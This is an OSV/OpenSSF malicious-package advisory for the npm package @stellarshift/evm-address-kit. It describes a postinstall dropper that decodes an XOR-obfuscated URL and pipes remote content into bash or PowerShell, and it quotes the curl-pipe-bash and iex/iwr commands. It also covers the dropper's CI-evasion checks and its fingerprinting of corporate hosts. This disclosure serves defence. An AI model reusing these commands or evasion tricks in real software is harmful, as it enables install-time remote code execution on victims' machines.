OpenSSF/OSV advisory MAL-2026-15823 confirms this npm version as malicious. The package declares a `postinstall` script that invokes `syncRemoteManifest` in `lib/runtime/manifest-sync.js`. The destination URL is not present in cleartext: `lib/runtime/endpoint-registry.json` stores an integer array under an `ss-xor-v1` encoding with seed `evm-address-kit`, which `lib/runtime/config-resolver.js` decodes via `segments[i] ^ key.charCodeAt(i % key.length) ^ ((i * 7 + 13) & 0xff)` at runtime to...
Source
OpenSSF Malicious Packages via OSV
Summary
Malicious code in @stellarshift/evm-address-kit (npm)
Details
The package declares a `postinstall` script that invokes `syncRemoteManifest` in `lib/runtime/manifest-sync.js`. The destination URL is not present in cleartext: `lib/runtime/endpoint-registry.json` stores an integer array under an `ss-xor-v1` encoding with seed `evm-address-kit`, which `lib/runtime/config-resolver.js` decodes via `segments[i] ^ key.charCodeAt(i % key.length) ^ ((i * 7 + 13) & 0xff)` at runtime to reconstruct an `https://` URL. The dropper then executes `curl -fsSL '<url>' | bash` on Linux/macOS or `powershell... iex (iwr -UseBasicParsing -Uri $uri).Content` on Windows in a detached child process, piping opaque remote content directly into a shell/PowerShell interpreter. Execution is gated by `dev-profile.js`: it aborts when common CI environment variables are set (`CI`, `GITHUB_ACTIONS`, `GITLAB_CI`, `JENKINS_URL`, `BUILDKITE`, `CIRCLECI`, `TF_BUILD`, `CONTINUOUS_INTEGRATION`) and, on darwin/win32, requires both a Lark/Feishu install (`/Applications/Lark.app`, `/Applications/Feishu.app`) and a FortiClient install (`Fortinet\FortiClient`) to be present. The stated purpose of the package is EVM address checksumming, which does not justify runtime URL obfuscation, remote shell execution at install time, or corporate-workstation fingerprinting. The combination — install-time execution, obfuscated destination, CI evasion, and specific-vendor host fingerprinting — is a targeted install-time remote code execution dropper aimed at managed corporate endpoints running Lark/Feishu with FortiClient VPN.
Decision reason
OpenSSF Malicious Packages via OSV confirms @stellarshift/evm-address-kit@1.0.1 as malicious (MAL-2026-15823): Malicious code in @stellarshift/evm-address-kit (npm)